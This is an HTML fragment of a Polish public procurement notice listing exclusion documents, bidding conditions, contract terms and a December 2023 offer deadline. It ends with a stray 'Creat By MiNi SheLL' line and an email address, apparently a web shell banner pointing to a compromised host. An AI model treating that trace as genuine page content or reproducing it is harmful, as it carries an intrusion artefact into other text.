class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych (oświadczeń lub dokumentów) składanych <br/>przez Wykonawcę w celu potwierdzenia braku podstaw do wykluczenia:<br/>1.a.i.1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie <br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do <br/>rejestru lub ewidencji.<br/>1.a.i.2) Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września <br/>2019 r. Prawo zamówień publicznych o niepodleganiu wykluczeniu i spełnianiu warunków <br/>udziału w postępowaniu. Wzór oświadczenia stanowi Załącznik Nr 2 do SWZ. <br/>1.a.i.3) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej <br/>Polskiej, zamiast dokumentów wymienionych wyżej, – składa dokument lub dokumenty wystawione <br/>w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że:<br/>1.a.a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie <br/>społeczne lub zdrowotne, <br/>1.a.b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, <br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje <br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach <br/>miejsca wszczęcia tej procedury.<br/>4) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce <br/>zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których <br/>mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem <br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób <br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał <br/>dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub <br/>miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed <br/>organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego <br/>lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania <br/>wykonawcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie <br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie <br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/>(Załącznik Nr 2 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu <br/>oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje <br/>spełnianie warunków.<br/>3) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/>składa każdy z Wykonawców wspólnie ubiegający się o zamówienie.<br/>4) Przedsiębiorcy prowadzący działalność w formie spółki cywilnej traktowani są <br/>jak Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. Wykonawcy ci <br/>zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w pkt 2 (Załącznik Nr 2 <br/>do SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/pn/zsrgrabski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com